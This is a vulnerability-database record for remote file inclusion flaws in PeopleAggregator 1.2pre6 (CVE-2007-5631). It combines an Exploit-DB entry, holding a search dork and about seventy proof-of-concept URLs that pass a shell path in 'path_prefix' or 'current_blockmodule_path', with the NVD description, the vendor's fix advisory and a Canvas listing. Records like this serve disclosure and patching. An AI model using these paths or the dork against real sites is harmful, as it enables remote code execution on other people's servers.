{"id": "EDB-ID:4551", "type": "exploitdb", "bulletinFamily": "exploit", "title": "PeopleAggregator <= 1.2pre6-release-53 - Multiple RFI Vulnerabilities", "description": "PeopleAggregator <= 1.2pre6-release-53 Multiple RFI Vulnerabilities. CVE-2007-5631. Webapps exploit for php platform", "published": "2007-10-21T00:00:00", "modified": "2007-10-21T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/4551/", "reporter": "GoLd_M", "references": [], "cvelist": ["CVE-2007-5631"], "lastseen": "2016-01-31T21:12:32", "viewCount": 5, "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2016-01-31T21:12:32", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-5631"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:18391", "SECURITYVULNS:VULN:8329"]}, {"type": "canvas", "idList": ["PEOPLEAGGREGATOR_INCLUDE"]}], "modified": "2016-01-31T21:12:32", "rev": 2}, "vulnersScore": 7.0}, "sourceHref": "https://www.exploit-db.com/download/4551/", "sourceData": "# PeopleAggregator 1.2pre6 Multiple Remote File Inclusion Vulnerabilities\n# http://update.peopleaggregator.org/dist/peopleaggregator-1.2pre6-release-53.tar.gz\n# DORK : \"copyright 2006 Broadband Mechanics\"\n# POC :\n# /web/Flickrclient.php?path_prefix=shell\n# /web/network_module_selector.php?path_prefix=shell\n# /web/submit_abuse.php?path_prefix=shell\n# /web/submit_comment.php?path_prefix=shell\n# /web/Administration/Includes/configureText.php?path_prefix=shell\n# /web/Administration/Includes/contentHome.php?path_prefix=shell\n# /web/Administration/Includes/deleteContent.php?path_prefix=shell\n# /web/Administration/Includes/deleteUser.php?path_prefix=shell\n# /web/Administration/Includes/userHome.php?path_prefix=shell\n# /web/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=shell\n# /web/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=shell\n# /web/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=shell\n# /web/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path=shell\n# /web/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=shell\n# /web/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=shell\n# /web/BetaBlockModules/EditProfileModule/external.php?path_prefix=shell\n# /web/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=shell\n# /web/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=shell\n# /web/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=shell\n# /web/BetaBlockModules/GroupForumModule/GroupForumModule.php?pa th_prefix=shell\n# /web/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=shell\n# /web/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=shell\n# /web/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=shell\n# /web/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=shell\n# /web/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=shell\n# /web/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=shell\n# /web/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path=shell\n# /web/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=shell\n# /web/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=shell\n# /web/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=shell\n# /web/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=shell\n# /web/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=shell\n# /web/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=shell\n# /web/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=shell\n# /web/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=shell\n# /web/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path=shell\n# /web/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=shell\n# /web/BetaBlockModules//Module/Module.php?path_prefix=shell\n# /web/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=shell\n# /web/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=shell\n# /web/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=shell\n# /web/BetaBlockModules/MyNetworksModule.php? path_prefix=shell\n# /web/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=shell\n# /web/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=shell\n# /web/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=shell\n# /web/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=shell\n# /web/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=shell\n# /web/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=shell\n# /web/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=shell\n# /web/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path=shell\n# /web/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=shell\n# /web/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=shell\n# /web/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=shell\n# /web/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=shell\n# /web/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=shell\n# /web/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=shell\n# /web/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=shell\n# /web/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=shell\n# /web/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=shell\n# /web/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=shell\n# /web/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=shell\n# /web/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=shell\n# /web/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmo dule_path=shell\n# /web/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=shell\n# /web/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=shell\n# /web/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path=shell\n# /web/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=shell\n# /web/includes/blogger.php?path_prefix=shell\n# /web/includes/functions/auto_email_notify.php?path_prefix=shell\n# /web/includes/functions/html_generate.php?path_prefix=shell\n# /web/includes/functions/validations.php?path_prefix=shell\n\n# milw0rm.com [2007-10-21]\n", "osvdbidlist": ["45499", "45495", "45498", "45501", "45496", "45497", "45500"]}

{"cve": [{"lastseen": "2020-10-03T11:45:54", "description": "Multiple PHP remote file inclusion vulnerabilities in PeopleAggregator 1.2pre6, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the current_blockmodule_path parameter to (1) AudiosMediaGalleryModule/AudiosMediaGalleryModule.php, (2) ImagesMediaGalleryModule/ImagesMediaGalleryModule.php, (3) MembersFacewallModule/MembersFacewallModule.php, (4) NewestGroupsModule/NewestGroupsModule.php, (5) UploadMediaModule/UploadMediaModule.php, and (6) VideosMediaGalleryModule/VideosMediaGalleryModule.php in BetaBlockModules/; and (7) the path_prefix parameter to several components.", "edition": 3, "cvss3": {}, "published": "2007-10-23T17:46:00", "title": "CVE-2007-5631", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-5631"], "modified": "2018-10-15T21:45:00", "cpe": ["cpe:/a:peopleaggregator:peopleaggregator:1.2pre6"], "id": "CVE-2007-5631", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5631", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:peopleaggregator:peopleaggregator:1.2pre6:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:24", "bulletinFamily": "software", "cvelist": ["CVE-2007-5631"], "description": "Hi all,\r\n\r\nThis is a notification that the remote file inclusion vulnerabilities reported \r\nin CVE-2007-5631 have been fixed in PeopleAggregator v1.2pre6-release-55, and \r\nare not exploitable if PHP&#39;s register_globals directive is disabled.\r\n\r\nCVE entry: http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5631\r\n\r\n-----\r\nMultiple PHP remote file inclusion vulnerabilities in PeopleAggregator 1.2pre6 \r\nallow remote attackers to execute arbitrary PHP code via a URL in the \r\ncurrent_blockmodule_path parameter to &#40;1&#41; \r\nAudiosMediaGalleryModule/AudiosMediaGalleryModule.php, &#40;2&#41; \r\nImagesMediaGalleryModule/ImagesMediaGalleryModule.php, &#40;3&#41; \r\nMembersFacewallModule/MembersFacewallModule.php, &#40;4&#41; \r\nNewestGroupsModule/NewestGroupsModule.php, &#40;5&#41; \r\nUploadMediaModule/UploadMediaModule.php, and &#40;6&#41; \r\nVideosMediaGalleryModule/VideosMediaGalleryModule.php in BetaBlockModules/; and \r\n&#40;7&#41; the path_prefix parameter to several components.\r\n-----\r\n \r\nNotes from vendor: To be exploitable, the web server must be configured with \r\nPHP&#39;s register_globals directive ON. To fix a vulnerable installation, either \r\nturn register_globals OFF in php.ini or via the php_flag Apache option, or \r\nupgrade to v1.2pre6-release-55.\r\n\r\nAdvisory blog post: http://www.myelin.co.nz/post/2007/11/12/#200711121\r\n\r\nUpgrade instructions:\r\n\r\n- If installed via Subversion, &#39;svn update&#39; in the root of your PeopleAggregator \r\ninstall.\r\n\r\n- If installed via tarball, download the latest tarball from \r\nhttp://update.peopleaggregator.org/dist/peopleaggregator-1.2pre6-release-\r\n55.tar.gz and copy all files over those from your existing installation.\r\n\r\nRegards,\r\nPhillip Pearson\r\nBroadband Mechanics", "edition": 1, "modified": "2007-11-12T00:00:00", "published": "2007-11-12T00:00:00", "id": "SECURITYVULNS:DOC:18391", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:18391", "title": "PeopleAggregatory security advisory - re CVE-2007-5631", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:27", "bulletinFamily": "software", "cvelist": ["CVE-2007-5631", "CVE-2007-5589", "CVE-2007-5386", "CVE-2007-3694"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.\r\nPHP-Nuke: CAPTCHA protection bypass.", "edition": 1, "modified": "2007-11-12T00:00:00", "published": "2007-11-12T00:00:00", "id": "SECURITYVULNS:VULN:8329", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8329", "title": "Daily web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "canvas": [{"lastseen": "2019-05-29T17:19:28", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5631"], "description": "**Name**| peopleaggregator_include \n---|--- \n**CVE**| CVE-2007-5631 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| peopleaggregator 1.2pre6 remote file include \n**Notes**| CVSS: 6.8 \nRepeatability: Infinite \nVENDOR: peopleaggregator.org \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5631 \nCVE Name: CVE-2007-5631 \n\n", "edition": 2, "modified": "2007-10-23T17:46:00", "published": "2007-10-23T17:46:00", "id": "PEOPLEAGGREGATOR_INCLUDE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/peopleaggregator_include", "type": "canvas", "title": "Immunity Canvas: PEOPLEAGGREGATOR_INCLUDE", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}